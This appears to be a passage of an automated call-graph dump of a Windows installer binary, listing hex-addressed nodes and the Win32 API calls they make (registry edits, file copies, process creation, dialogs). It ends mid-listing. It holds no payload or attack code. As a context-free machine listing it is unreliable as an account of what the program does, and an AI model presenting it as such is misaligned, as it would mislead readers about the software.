4052c6 4150->4152 4153 40529e GetDlgItem CreateThread CloseHandle 4150->4153 4198 403d98 SendMessageW 4151->4198 4155 4052f4 4152->4155 4157 4052e0 ShowWindow ShowWindow 4152->4157 4158 405316 4152->4158 4153->4152 4201 405047 83 API calls 4153->4201 4159 405352 4155->4159 4161 405305 4155->4161 4162 40532b ShowWindow 4155->4162 4156 405162 4169 406805 18 API calls 4156->4169 4200 403d98 SendMessageW 4157->4200 4163 403dca 8 API calls 4158->4163 4159->4158 4164 40535d SendMessageW 4159->4164 4165 403d18 SendMessageW 4161->4165 4167 40534b 4162->4167 4168 40533d 4162->4168 4166 40528e 4163->4166 4164->4166 4171 405376 CreatePopupMenu 4164->4171 4165->4158 4170 403d18 SendMessageW 4167->4170 4172 404f72 25 API calls 4168->4172 4173 405181 4169->4173 4170->4159 4175 406805 18 API calls 4171->4175 4172->4167 4174 4062a3 11 API calls 4173->4174 4176 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4174->4176 4177 405386 AppendMenuW 4175->4177 4178 4051f3 4176->4178 4179 4051d7 SendMessageW SendMessageW 4176->4179 4180 405399 GetWindowRect 4177->4180 4181 4053ac 4177->4181 4182 405206 4178->4182 4183 4051f8 SendMessageW 4178->4183 4179->4178 4184 4053b3 TrackPopupMenu 4180->4184 4181->4184 4185 403d3f 19 API calls 4182->4185 4183->4182 4184->4166 4186 4053d1 4184->4186 4187 405216 4185->4187 4188 4053ed SendMessageW 4186->4188 4189 405253 GetDlgItem SendMessageW 4187->4189 4190 40521f ShowWindow 4187->4190 4188->4188 4191 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4188->4191 4189->4166 4194 405276 SendMessageW SendMessageW 4189->4194 4192 405242 4190->4192 4193 405235 ShowWindow 4190->4193 4195 40542f SendMessageW 4191->4195 4199 403d98 SendMessageW 4192->4199 4193->4192 4194->4166 4195->4195 4196 40545a GlobalUnlock SetClipboardData CloseClipboard 4195->4196 4196->4166 4198->4156 4199->4189 4200->4155 4377 4030cf 4378 40145c 18 API calls 4377->4378 4379 4030d6 4378->4379 4380 4030dc 4379->4380 4384 4063ac GlobalAlloc lstrlenW 4379->4384 4382 4030e3 4380->4382 4411 405f51 wsprintfW 4380->4411 4385 4063e2 4384->4385 4386 406434 4384->4386 4387 40640f GetVersionExW 4385->4387 4412 40602b CharUpperW 4385->4412 4386->4380 4387->4386 4388 40643e 4387->4388 4390 406464 LoadLibraryA 4388->4390 4391 40644d 4388->4391 4390->4386 4393 406482 GetProcAddress GetProcAddress GetProcAddress 4390->4393 4391->4386 4392 406585 GlobalFree 4391->4392 4394 40659b LoadLibraryA 4392->4394 4395 4066dd FreeLibrary 4392->4395 4399 4064aa 4393->4399 4402 4065f5 4393->4402 4394->4386 4397 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4394->4397 4395->4386 4396 406651 FreeLibrary 4398 40662a 4396->4398 4397->4402 4401 4066ea 4398->4401 4408 406685 lstrcmpW 4398->4408 4409 4066b6 CloseHandle 4398->4409 4410 4066d4 CloseHandle 4398->4410 4400 4064ce FreeLibrary GlobalFree 4399->4400 4399->4402 4406 4064ea 4399->4406 4400->4386 4405 4066ef CloseHandle FreeLibrary 4401->4405 4402->4396 4402->4398 4403 4064fc lstrcpyW OpenProcess 4404 40654f CloseHandle CharUpperW lstrcmpW 4403->4404 4403->4406 4404->4402 4404->4406 4407 406704 CloseHandle 4405->4407 4406->4392 4406->4403 4406->4404 4407->4405 4408->4398 4408->4407 4409->4398 4410->4395 4411->4382 4412->4385 4413 407752 4417 407344 4413->4417 4414 407c6d 4415 4073c2 GlobalFree 4416 4073cb GlobalAlloc 4415->4416 4416->4414 4416->4417 4417->4414 4417->4415 4417->4416 4417->4417 4418 407443 GlobalAlloc 4417->4418 4419 40743a GlobalFree 4417->4419 4418->4414 4418->4417 4419->4418 4420 401dd3 4421 401446 18 API calls 4420->4421 4422 401dda 4421->4422 4423 401446 18 API calls 4422->4423 4424 4018d3 4423->4424 4425 4028d3 RegCreateKeyExW 4426 4028e8 4425->4426 4430 4029ef 4425->4430 4427 402934 4426->4427 4429 40145c 18 API calls 4426->4429 4428 402963 4427->4428 4431 401446 18 API calls 4427->4431 4432 4029ae RegSetValueExW 4428->4432 4437 40337f 37 API calls 4428->4437 4433 4028fc lstrlenW 4429->4433 4436 402947 4431->4436 4434 4029c6 RegCloseKey 4432->4434 4435 4029cb 4432->4435 4438 402918 4433->4438 4439 40292a 4433->4439 4434->4430 4441 4062a3 11 API calls 4435->4441 4442 4062a3 11 API calls 4436->4442 4443 40297b 4437->4443 4444 4062a3 11 API calls 4438->4444 4440 4062a3 11 API calls 4439->4440 4440->4427 4441->4434 4442->4428 4450 406224 4443->4450 4445 402922 4444->4445 4445->4432 4449 4062a3 11 API calls 4449->4445 4451 406247 4450->4451 4452 40628a 4451->4452 4453 40625c wsprintfW 4451->4453 4454 402991 4452->4454 4455 406293 lstrcatW 4452->4455 4453->4452 4453->4453 4454->4449 4455->4454 4456 4040d3 4457 4040dd 4456->4457 4458 40410e 4457->4458 4471 403fca WideCharToMultiByte 4457->4471 4460 403d3f 19 API calls 4458->4460 4461 40414e 4460->4461 4462 403d3f 19 API calls 4461->4462 4463 40415b CheckDlgButton 4462->4463 4474 403d85 KiUserCallbackDispatcher 4463->4474 4465 404179 GetDlgItem 4475 403d98 SendMessageW 4465->4475 4467 40418f SendMessageW 4468 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4467->4468 4469 4041ac GetSysColor 4467->4469 4470 40435c 4468->4470 4469->4468 4472 404007 4471->4472 4473 403fe9 GlobalAlloc WideCharToMultiByte 4471->4473 4472->4458 4473->4472 4474->4465 4475->4467 4483 401cd5 4484 401446 18 API calls 4483->4484 4485 401cdd 4484->4485 4486 401446 18 API calls 4485->4486 4487 401ce8 4486->4487 4488 40145c 18 API calls 4487->4488 4489 401cf1 4488->4489 4490 401d07 lstrlenW 4489->4490 4495 401d43 4489->4495 4491 401d11 4490->4491 4491->4495 4496 406009 lstrcpynW 4491->4496 4493 401d2c 4494 401d39 lstrlenW 4493->4494 4493->4495 4494->4495 4496->4493 4497 403cd6 4498 403ce1 4497->4498 4499 403ce5 4498->4499 4500 403ce8 GlobalAlloc 4498->4500 4500->4499 4501 402cd7 4502 401446 18 API calls 4501->4502 4503 402c64 4502->4503 4503->4501 4504 402d99 4503->4504 4505 402d17 ReadFile 4503->4505 4505->4503 4506 402dd8 4507 4030e3 4506->4507 4508 402ddf 4506->4508 4509 402de5 FindClose 4508->4509 4509->4507 4510 401d5c 4511 40145c 18 API calls 4510->4511 4512 401d63 4511->4512 4513 40145c 18 API calls 4512->4513 4514 401d6c 4513->4514 4515 401d73 lstrcmpiW 4514->4515 4516 401d86 lstrcmpW 4514->4516 4517 401d79 4515->4517 4516->4517 4518 401c99 4516->4518 4517->4516 4517->4518 4202 407c5f 4204 407344 4202->4204 4203 407c6d 4204->4203 4205 4073c2 GlobalFree 4204->4205 4206 4073cb GlobalAlloc 4204->4206 4207 407443 GlobalAlloc 4204->4207 4208 40743a GlobalFree 4204->4208 4205->4206 4206->4203 4206->4204 4207->4203 4207->4204 4208->4207 4519 404363 4520 404373 4519->4520 4521 40439c 4519->4521 4522 403d3f 19 API calls 4520->4522 4523 403dca 8 API calls 4521->4523 4525 404380 SetDlgItemTextW 4522->4525 4524 4043a8 4523->4524 4525->4521 4526 4027e3 4527 4027e9 4526->4527 4528 4027f2 4527->4528 4529 402836 4527->4529 4542 401553 4528->4542 4531 40145c 18 API calls 4529->4531 4533 40283d 4531->4533 4532 4027f9 4535 40145c 18 API calls 4532->4535 4540 401a13 4532->4540 4534 4062a3 11 API calls 4533->4534 4536 40284d 4534->4536 4537 40280a RegDeleteValueW 4535->4537 4546 40149d RegOpenKeyExW 4536->4546 4539 4062a3 11 API calls 4537->4539 4541 40282a RegCloseKey 4539->4541 4541->4540 4543 401563 4542->4543 4544 40145c 18 API calls 4543->4544 4545 401589 RegOpenKeyExW 4544->4545 4545->4532 4550 4014c9 4546->4550 4554 401515 4546->4554 4547 4014ef RegEnumKeyW 4548 401501 RegCloseKey 4547->4548 4547->4550 4551 4062fc 3 API calls 4548->4551 4549 401526 RegCloseKey 4549->4554 4550->4547 4550->4548 4550->4549 4552 40149d 3 API calls 4550->4552 4553 401511 4551->4553 4552->4550 4553->4554 4555 401541 RegDeleteKeyW 4553->4555 4554->4540 4555->4554 4556 403f64 4557 403f90 4556->4557 4558 403f74 4556->4558 4560 403fc3 4557->4560 4561 403f96 SHGetPathFromIDListW 4557->4561 4567 405c84 GetDlgItemTextW 4558->4567 4563 403fad SendMessageW 4561->4563 4564 403fa6 4561->4564 4562 403f81 SendMessageW 4562->4557 4563->4560 4565 40141d 80 API calls 4564->4565 4565->4563 4567->4562 4568 402ae4 4569 4030e3 4568->4569 4570 402aeb 4568->4570 4571 402af2 CloseHandle 4570->4571 4571->4569 4572 402065 4573 401446 18 API calls 4572->4573 4574 40206d 4573->4574 4575 401446 18 API calls 4574->4575 4576 402076 GetDlgItem 4575->4576 4577 4030dc 4576->4577 4578 4030e3 4577->4578 4580 405f51 wsprintfW 4577->4580 4580->4578 4581 402665 4582 40145c 18 API calls 4581->4582 4583 40266b 4582->4583 4584 40145c 18 API calls 4583->4584 4585 402674 4584->4585 4586 40145c 18 API calls 4585->4586 4587 40267d 4586->4587 4588 4062a3 11 API calls 4587->4588 4589 40268c 4588->4589 4590 4062d5 2 API calls 4589->4590 4591 402695 4590->4591 4592 4026a6 lstrlenW lstrlenW 4591->4592 4593 404f72 25 API calls 4591->4593 4596 4030e3 4591->4596 4594 404f72 25 API calls 4592->4594 4593->4591 4595 4026e8 SHFileOperationW 4594->4595 4595->4591 4595->4596 4604 401c69 4605 40145c 18 API calls 4604->4605 4606 401c70 4605->4606 4607 4062a3 11 API calls 4606->4607 4608 401c80 4607->4608 4609 405ca0 MessageBoxIndirectW 4608->4609 4610 401a13 4609->4610 4618 402f6e 4619 402f72 4618->4619 4620 402fae 4618->4620 4621 4062a3 11 API calls 4619->4621 4622 40145c 18 API calls 4620->4622 4623 402f7d 4621->4623 4628 402f9d 4622->4628 4624 4062a3 11 API calls 4623->4624 4625 402f90 4624->4625 4626 402fa2 4625->4626 4627 402f98 4625->4627 4630 4060e7 9 API calls 4626->4630 4629 403e74 5 API calls 4627->4629 4629->4628 4630->4628 4631 4023f0 4632 402403 4631->4632 4646 4024da 4631->4646 4633 40145c 18 API calls 4632->4633 4635 40240a 4633->4635 4634 404f72 25 API calls 4640 4024f1 4634->4640 4636 40145c 18 API calls 4635->4636 4637 402413 4636->4637 4638 402429 LoadLibraryExW 4637->4638 4639 40241b GetModuleHandleW 4637->4639 4641 40243e 4638->4641 4642 4024ce 4638->4642 4639->4638 4639->4641 4655 406365 GlobalAlloc WideCharToMultiByte 4641->4655 4644 404f72 25 API calls 4642->4644 4644->4646 4645 402449 4647 40248c 4645->4647 4648 40244f 4645->4648 4646->4634 4649 404f72 25 API calls 4647->4649 4653 40245f 4648->4653 4658 401435 4648->4658 4651 402496 4649->4651 4652 4062a3 11 API calls 4651->4652 4652->4653 4653->4640 4654 4024c0 FreeLibrary 4653->4654 4654->4640 4656 406390 GetProcAddress 4655->4656 4657 40639d GlobalFree 4655->4657 4656->4657 4657->4645 4659 404f72 25 API calls 4658->4659 4660 401443 4659->4660 4660->4653 4661 402df3 4662 4019ec 4661->4662 4663 402dfa 4661->4663 4664 402e07 FindNextFileW 4663->4664 4664->4662 4665 402e16 4664->4665 4667 406009 lstrcpynW 4665->4667 4667->4662 4004 402175 4005 401446 18 API calls 4004->4005 4006 40217c 4005->4006 4007 401446 18 API calls 4006->4007 4008 402186 4007->4008 4009 402197 4008->4009 4010 4062a3 11 API calls 4008->4010 4011 4021aa EnableWindow 4009->4011 4012 40219f ShowWindow 4009->4012 4010->4009 4013 4030e3 4011->4013 4012->4013 4675 404077 4676 404081 4675->4676 4677 404084 lstrcpynW lstrlenW 4675->4677 4676->4677 4030 405479 4031 405491 4030->4031 4032 4055cd 4030->4032 4031->4032 4033 40549d 4031->4033 4034 40561e 4032->4034 4035 4055de GetDlgItem GetDlgItem 4032->4035 4036 4054a8 SetWindowPos 4033->4036 4037 4054bb 4033->4037 4039 405678 4034->4039 4048 40139d 80 API calls 4034->4048 4100 403d3f 4035->4100 4036->4037 4041 4054c0 ShowWindow 4037->4041 4042 4054d8 4037->4042 4040 403daf SendMessageW 4039->4040 4044 4055c8 4039->4044 4070 40568a 4040->4070 4041->4042 4045 4054e0 DestroyWindow 4042->4045 4046 4054fa 4042->4046 4043 405608 KiUserCallbackDispatcher 4047 40141d 80 API calls 4043->4047 4049 4058dc 4045->4049 4050 405510 4046->4050 4051 4054ff SetWindowLongW 4046->4051 4047->4034 4052 405650 4048->4052 4049->4044 4059 40590d ShowWindow 4049->4059 4055 4055b9 4050->4055 4056 40551c GetDlgItem 4050->4056 4051->4044 4052->4039 4057 405654 SendMessageW 4052->4057 4053 40141d 80 API calls 4053->4070 4054 4058de DestroyWindow KiUserCallbackDispatcher 4054->4049 4109 403dca 4055->4109 4060 40554c 4056->4060 4061 40552f SendMessageW IsWindowEnabled 4056->4061 4057->4044 4059->4044 4063 405559 4060->4063 4064 4055a0 SendMessageW 4060->4064 4065 40556c 4060->4065 4074 405551 4060->4074 4061->4044 4061->4060 4062 406805 18 API calls 4062->4070 4063->4064 4063->4074 4064->4055 4067 405574 4065->4067 4068 405589 4065->4068 4071 40141d 80 API calls 4067->4071 4072 40141d 80 API calls 4068->4072 4069 405587 4069->4055 4070->4044 4070->4053 4070->4054 4070->4062 4073 403d3f 19 API calls 4070->4073 4076 403d3f 19 API calls 4070->4076 4091 40581e DestroyWindow 4070->4091 4071->4074 4075 405590 4072->4075 4073->4070 4106 403d18 4074->4106 4075->4055 4075->4074 4077 405705 GetDlgItem 4076->4077 4078 405723 ShowWindow KiUserCallbackDispatcher 4077->4078 4079 40571a 4077->4079 4103 403d85 KiUserCallbackDispatcher 4078->4103 4079->4078 4081 40574d EnableWindow 4084 405761 4081->4084 4082 405766 GetSystemMenu EnableMenuItem SendMessageW 4083 405796 SendMessageW 4082->4083 4082->4084 4083->4084 4084->4082 4104 403d98 SendMessageW 4084->4104 4105 406009 lstrcpynW 4084->4105 4087 4057c4 lstrlenW 4088 406805 18 API calls 4087->4088 4089 4057da SetWindowTextW 4088->4089 4090 40139d 80 API calls 4089->4090 4090->4070 4091->4049 4092 405838 CreateDialogParamW 4091->4092 4092->4049 4093 40586b 4092->4093 4094 403d3f 19 API calls 4093->4094 4095 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4094->4095 4096 40139d 80 API calls 4095->4096 4097 4058bc 4096->4097 4097->4044 4098 4058c4 ShowWindow 4097->4098 4099 403daf SendMessageW 4098->4099 4099->4049 4101 406805 18 API calls 4100->4101 4102 403d4a SetDlgItemTextW 4101->4102 4102->4043 4103->4081 4104->4084 4105->4087 4107 403d25 SendMessageW 4106->4107 4108 403d1f 4106->4108 4107->4069 4108->4107 4110 403ddf GetWindowLongW 4109->4110 4120 403e68 4109->4120 4111 403df0 4110->4111 4110->4120 4112 403e02 4111->4112 4113 403dff GetSysColor 4111->4113 4114 403e12 SetBkMode 4112->4114 4115 403e08 SetTextColor 4112->4115 4113->4112 4116 403e30 4114->4116 4117 403e2a GetSysColor 4114->4117 4115->4114 4118 403e41 4116->4118 4119 403e37 SetBkColor 4116->4119 4117->4116 4118->4120 4121 403e54 DeleteObject 4118->4121 4122 403e5b CreateBrushIndirect 4118->4122 4119->4118 4120->4044 4121->4122 4122->4120 4678 4020f9 GetDC GetDeviceCaps 4679 401446 18 API calls 4678->4679 4680 402116 MulDiv 4679->4680 4681 401446 18 API calls 4680->4681 4682 40212c 4681->4682 4683 406805 18 API calls 4682->4683 4684 402165 CreateFontIndirectW 4683->4684 4685 4030dc 4684->4685 4686 4030e3 4685->4686 4688 405f51 wsprintfW 4685->4688 4688->4686 4689 4024fb 4690 40145c 18 API calls 4689->4690 4691 402502 4690->4691 4692 40145c 18 API calls 4691->4692 4693 40250c 4692->4693 4694 40145c 18 API calls 4693->4694 4695 402515 4694->4695 4696 40145c 18 API calls 4695->4696 4697 40251f 4696->4697 4698 40145c 18 API calls 4697->4698 4699 402529 4698->4699 4700 40253d 4699->4700 4701 40145c 18 API calls 4699->4701 4702 4062a3 11 API calls 4700->4702 4701->4700 4703 40256a CoCreateInstance 4702->4703 4704 40258c 4703->4704 4705 40497c GetDlgItem GetDlgItem 4706 4049d2 7 API calls 4705->4706 4716 404bea 4705->4716 4707 404a76 DeleteObject 4706->4707 4708 404a6a SendMessageW 4706->4708 4709 404a81 4707->4709 4708->4707 4711 404ab8 4709->4711 4713 406805 18 API calls 4709->4713 4710 404ccf 4712 404d74 4710->4712 4718 404bdd 4710->4718 4723 404d1e SendMessageW 4710->4723 4717 403d3f 19 API calls 4711->4717 4714 404d89 4712->4714 4715 404d7d SendMessageW 4712->4715 4720 404a9a SendMessageW SendMessageW 4713->4720 4725 404da2 4714->4725 4726 404d9b ImageList_Destroy 4714->4726 4734 404db2 4714->4734 4715->4714 4716->4710 4721 40484e 5 API calls 4716->4721 4737 404c5a 4716->4737 4722 404acc 4717->4722 4724 403dca 8 API calls 4718->4724 4719 404cc1 SendMessageW 4719->4710 4720->4709 4721->4737 4727 403d3f 19 API calls 4722->4727 4723->4718 4729 404d33 SendMessageW 4723->4729 4730 404f6b 4724->4730 4731 404dab GlobalFree 4725->4731 4725->4734 4726->4725 4740 404add 4727->4740 4728 404f1c 4728->4718 4735 404f31 ShowWindow GetDlgItem ShowWindow 4728->4735 4732 404d46 4729->4732 4731->4734 4742 404d57 SendMessageW 4732->4742 4733 404baa GetWindowLongW SetWindowLongW 4736 404bc4 4733->4736 4734->4728 4741 40141d 80 API calls 4734->4741 4752 404de4 4734->4752 4735->4718 4738 404be2 4736->4738 4739 404bca ShowWindow 4736->4739 4737->4710 4737->4719 4757 403d98 SendMessageW 4738->4757 4756 403d98 SendMessageW 4739->4756 4740->4733 4743 404ba4 4740->4743 4746 404b39 SendMessageW 4740->4746 4747 404b67 SendMessageW 4740->4747 4748 404b7b SendMessageW 4740->4748 4741->4752 4742->4712 4743->4733 4743->4736 4746->4740 4747->4740 4748->4740 4749 404ef3 InvalidateRect 4749->4728 4750 404f09 4749->4750 4758 4043ad 4750->4758 4751 404e12 SendMessageW 4755 404e28 4751->4755 4752->4751 4752->4755 4754 404ea1 SendMessageW SendMessageW 4754->4755 4755->4749 4755->4754 4756->4718 4757->4716 4759 4043cd 4758->4759 4760 406805 18 API calls 4759->4760 4761 40440d 4760->4761 4762 406805 18 API calls 4761->4762 4763 404418 4762->4763 4764 406805 18 API calls 4763->4764 4765 404428 lstrlenW wsprintfW SetDlgItemTextW 4764->4765 4765->4728 4766 4026fc 4768 401ee4 4766->4768 4769 402708 4766->4769 4767 406805 18 API calls 4767->4768 4768->4766 4768->4767 4770 4019fd 4771 40145c 18 API calls 4770->4771 4772 401a04 4771->4772 4773 405e7f 2 API calls 4772->4773 4774 401a0b 4773->4774 4775 4022fd 4776 40145c 18 API calls 4775->4776 4777 402304 GetFileVersionInfoSizeW 4776->4777 4778 4030e3 4777->4778 4779 40232b GlobalAlloc 4777->4779 4779->4778 4780 40233f GetFileVersionInfoW 4779->4780 4781 402350 VerQueryValueW 4780->4781 4782 402381 GlobalFree 4780->4782 4781->4782 4783 402369 4781->4783 4782->4778 4788 405f51 wsprintfW 4783->4788 4786 402375 4789 405f51 wsprintfW 4786->4789 4788->4786 4789->4782 4790 402afd 4791 40145c 18 API calls 4790->4791 4792 402b04 4791->4792 4797 405e50 GetFileAttributesW CreateFileW 4792->4797 4794 402b10 4795 4030e3 4794->4795 4798 405f51 wsprintfW 4794->4798 4797->4794 4798->4795 4799 4029ff 4800 401553 19 API calls 4799->4800 4801 402a09 4800->4801 4802 40145c 18 API calls 4801->4802 4803 402a12 4802->4803 4804 402a1f RegQueryValueExW 4803->4804 4809 401a13 4803->4809 4805 402a45 4804->4805 4806 402a3f 4804->4806 4807 4029e4 RegCloseKey 4805->4807 4805->4809 4806->4805 4810 405f51 wsprintfW 4806->4810 4807->4809 4810->4805 4811 401000 4812 401037 BeginPaint GetClientRect 4811->4812 4813 40100c DefWindowProcW 4811->4813 4815 4010fc 4812->4815 4816 401182 4813->4816 4817 401073 CreateBrushIndirect FillRect DeleteObject 4815->4817 4818 401105 4815->4818 4817->4815 4819 401170 EndPaint 4818->4819 4820 40110b CreateFontIndirectW 4818->4820 4819->4816 4820->4819 4821 40111b 6 API calls 4820->4821 4821->4819 4822 401f80 4823 401446 18 API calls 4822->4823 4824 401f88 4823->4824 4825 401446 18 API calls 4824->4825 4826 401f93 4825->4826 4827 401fa3 4826->4827 4828 40145c 18 API calls 4826->4828 4829 401fb3 4827->4829 4830 40145c 18 API calls 4827->4830 4828->4827 4831 402006 4829->4831 4832 401fbc 4829->4832 4830->4829 4833 40145c 18 API calls 4831->4833 4834 401446 18 API calls 4832->4834 4835 40200d 4833->4835 4836 401fc4 4834->4836 4838 40145c 18 API calls 4835->4838 4837 401446 18 API calls 4836->4837 4839 401fce 4837->4839 4840 402016 FindWindowExW 4838->4840 4841 401ff6 SendMessageW 4839->4841 4842 401fd8 SendMessageTimeoutW 4839->4842 4843 402036 4840->4843 4841->4843 4842->4843 4844 4030e3 4843->4844 4846 405f51 wsprintfW 4843->4846 4846->4844 4847 402082 4848 401446 18 API calls 4847->4848 4849 402093 SetWindowLongW 4848->4849 4850 4030e3 4849->4850 3389 403883 #17 SetErrorMode OleInitialize 3463 4062fc GetModuleHandleA 3389->3463 3393 4038f1 GetCommandLineW 3468 406009 lstrcpynW 3393->3468 3395 403903 GetModuleHandleW 3396 40391b 3395->3396 3469 405d06 3396->3469 3399 4039d6 3400 4039f5 GetTempPathW 3399->3400 3473 4037cc 3400->3473 3402 403a0b 3403 403a33 DeleteFileW 3402->3403 3404 403a0f GetWindowsDirectoryW lstrcatW 3402->3404 3481 403587 GetTickCount GetModuleFileNameW 3403->3481 3406 4037cc 11 API calls 3404->3406 3405 405d06 CharNextW 3408 40393c 3405->3408 3409 403a2b 3406->3409 3408->3399 3408->3405 3419 4039d8 3408->3419 3409->3403 3411 403acc 3409->3411 3410 403a47 3410->3411 3413 403ab1 3410->3413 3415 405d06 CharNextW 3410->3415 3566 403859 3411->3566 3509 40592c 3413->3509 3429 403a5e 3415->3429 3417 403ae1 3573 405ca0 3417->3573 3418 403bce 3423 403c51 3418->3423 3424 4062fc 3 API calls 3418->3424 3577 406009 lstrcpynW 3419->3577 3420 403ac1 3594 4060e7 3420->3594 3426 403bdd 3424->3426 3431 4062fc 3 API calls 3426->3431 3427 403af7 lstrcatW lstrcmpiW 3427->3411 3433 403b13 CreateDirectoryW SetCurrentDirectoryW 3427->3433 3428 403a89 3578 40677e 3428->3578 3429->3427 3429->3428 3434 403be6 3431->3434 3436 403b36 3433->3436 3437 403b2b 3433->3437 3438 4062fc 3 API calls 3434->3438 3608 406009 lstrcpynW 3436->3608 3607 406009 lstrcpynW 3437->3607 3441 403bef 3438->3441 3444 403c3d ExitWindowsEx 3441->3444 3450 403bfd GetCurrentProcess 3441->3450 3443 403b44 3609 406009 lstrcpynW 3443->3609 3444->3423 3447 403c4a 3444->3447 3445 403aa6 3593 406009 lstrcpynW 3445->3593 3637 40141d 3447->3637 3453 403c0d 3450->3453 3453->3444 3454 403b79 CopyFileW 3460 403b53 3454->3460 3455 403bc2 3457 406c68 42 API calls 3455->3457 3458 403bc9 3457->3458 3458->3411 3459 406805 18 API calls 3459->3460 3460->3455 3460->3459 3462 403bad CloseHandle 3460->3462 3610 406805 3460->3610 3629 406c68 3460->3629 3634 405c3f CreateProcessW 3460->3634 3462->3460 3464 406314 LoadLibraryA 3463->3464 3465 40631f GetProcAddress 3463->3465 3464->3465 3466 4038c6 SHGetFileInfoW 3464->3466 3465->3466 3467 406009 lstrcpynW 3466->3467 3467->3393 3468->3395 3470 405d0c 3469->3470 3471 40392a CharNextW 3470->3471 3472 405d13 CharNextW 3470->3472 3471->3408 3472->3470 3640 406038 3473->3640 3475 4037e2 3475->3402 3476 4037d8 3476->3475 3649 406722 lstrlenW CharPrevW 3476->3649 3656 405e50 GetFileAttributesW CreateFileW 3481->3656 3483 4035c7 3503 4035d7 3483->3503 3657 406009 lstrcpynW 3483->3657 3485 4035ed 3658 406751 lstrlenW 3485->3658 3489 4035fe GetFileSize 3490 4036fa 3489->3490 3502 403615 3489->3502 3665 4032d2 3490->3665 3492 403703 3494 40373f GlobalAlloc 3492->3494 3492->3503 3699 403368 SetFilePointer 3492->3699 3676 403368 SetFilePointer 3494->3676 3496 4037bd 3499 4032d2 6 API calls 3496->3499 3498 403720 3501 403336 ReadFile 3498->3501 3499->3503 3500 40375a 3677 40337f 3500->3677 3505 40372b 3501->3505 3502->3490 3502->3496 3502->3503 3506 4032d2 6 API calls 3502->3506 3663 403336 ReadFile 3502->3663 3503->3410 3505->3494 3505->3503 3506->3502 3507 403766 3507->3503 3507->3507 3508 403794 SetFilePointer 3507->3508 3508->3503 3510 4062fc 3 API calls 3509->3510 3511 405940 3510->3511 3512 405946 3511->3512 3513 405958 3511->3513 3740 405f51 wsprintfW 3512->3740 3741 405ed3 RegOpenKeyExW 3513->3741 3517 4059a8 lstrcatW 3519 405956 3517->3519 3518 405ed3 3 API calls 3518->3517 3723 403e95 3519->3723 3522 40677e 18 API calls 3523 4059da 3522->3523 3524 405a70 3523->3524 3526 405ed3 3 API calls 3523->3526 3525 40677e 18 API calls 3524->3525 3527 405a76 3525->3527 3528 405a0c 3526->3528 3529 405a86 3527->3529 3530 406805 18 API calls 3527->3530 3528->3524 3534 405a2f lstrlenW 3528->3534 3540 405d06 CharNextW 3528->3540 3531 405aa6 LoadImageW 3529->3531 3747 403e74 3529->3747 3530->3529 3532 405ad1 RegisterClassW 3531->3532 3533 405b66 3531->3533 3538 405b19 SystemParametersInfoW CreateWindowExW 3532->3538 3565 405b70 3532->3565 3539 40141d 80 API calls 3533->3539 3535 405a63 3534->3535 3536 405a3d lstrcmpiW 3534->3536 3543 406722 3 API calls 3535->3543 3536->3535 3541 405a4d GetFileAttributesW 3536->3541 3538->3533 3544 405b6c 3539->3544 3545 405a2a 3540->3545 3546 405a59 3541->3546 3542 405a9c 3542->3531 3547 405a69 3543->3547 3550 403e95 19 API calls 3544->3550 3544->3565 3545->3534 3546->3535 3548 406751 2 API calls 3546->3548 3746 406009 lstrcpynW 3547->3746 3548->3535 3551 405b7d 3550->3551 3552 405b89 ShowWindow LoadLibraryW 3551->3552 3553 405c0c 3551->3553 3555 405ba8 LoadLibraryW 3552->3555 3556 405baf GetClassInfoW 3552->3556 3732 405047 OleInitialize 3553->3732 3555->3556 3557 405bc3 GetClassInfoW RegisterClassW 3556->3557 3558 405bd9 DialogBoxParamW 3556->3558 3557->3558 3560 40141d 80 API calls 3558->3560 3559 405c12 3561 405c16 3559->3561 3562 405c2e 3559->3562 3560->3565 3564 40141d 80 API calls 3561->3564 3561->3565 3563 40141d 80 API calls 3562->3563 3563->3565 3564->3565 3565->3420 3567 403871 3566->3567 3568 403863 CloseHandle 3566->3568 3892 403c83 3567->3892 3568->3567 3574 405cb5 3573->3574 3575 403aef ExitProcess 3574->3575 3576 405ccb MessageBoxIndirectW 3574->3576 3576->3575 3577->3400 3949 406009 lstrcpynW 3578->3949 3580 40678f 3581 405d59 4 API calls 3580->3581 3582 406795 3581->3582 3583 406038 5 API calls 3582->3583 3590 403a97 3582->3590 3589 4067a5 3583->3589 3584 4067dd lstrlenW 3585 4067e4 3584->3585 3584->3589 3586 406722 3 API calls 3585->3586 3588 4067ea GetFileAttributesW 3586->3588 3587 4062d5 2 API calls 3587->3589 3588->3590 3589->3584 3589->3587 3589->3590 3591 406751 2 API calls 3589->3591 3590->3411 3592 406009 lstrcpynW 3590->3592 3591->3584 3592->3445 3593->3413 3595 4060f3 3594->3595 3598 406110 3594->3598 3596 4060fd CloseHandle 3595->3596 3597 406104 3595->3597 3596->3597 3597->3411 3598->3597 3599 406187 3598->3599 3600 40612d 3598->3600 3599->3597 3601 406190 lstrcatW lstrlenW WriteFile 3599->3601 3600->3601 3602 406136 GetFileAttributesW 3600->3602 3601->3597 3950 405e50 GetFileAttributesW CreateFileW 3602->3950 3604 406152 3604->3597 3605 406162 WriteFile 3604->3605 3606 40617c SetFilePointer 3604->3606 3605->3606 3606->3599 3607->3436 3608->3443 3609->3460 3612 406812 3610->3612 3611 406a7f 3613 403b6c DeleteFileW 3611->3613 3953 406009 lstrcpynW 3611->3953 3612->3611 3615 4068d3 GetVersion 3612->3615 3616 406a46 lstrlenW 3612->3616 3617 406805 10 API calls 3612->3617 3623 406038 5 API calls 3612->3623 3951 405f51 wsprintfW 3612->3951 3952 406009 lstrcpynW 3612->3952 3613->3454 3613->3460 3626 4068e0 3615->3626 3616->3612 3617->3616 3620 405ed3 3 API calls 3620->3626 3621 406952 GetSystemDirectoryW 3621->3626 3622 406965 GetWindowsDirectoryW 3622->3626 3623->3612 3624 406805 10 API calls 3624->3626 3625 4069df lstrcatW 3625->3612 3626->3612 3626->3620 3626->3621 3626->3622 3626->3624 3626->3625 3627 406999 SHGetSpecialFolderLocation 3626->3627 3627->3626 3628 4069b1 SHGetPathFromIDListW CoTaskMemFree 3627->3628 3628->3626 3630 4062fc 3 API calls 3629->3630 3631 406c6f 3630->3631 3633 406c90 3631->3633 3954 406a99 lstrcpyW 3631->3954 3633->3460 3635 405c7a 3634->3635 3636 405c6e CloseHandle 3634->3636 3635->3460 3636->3635 3638 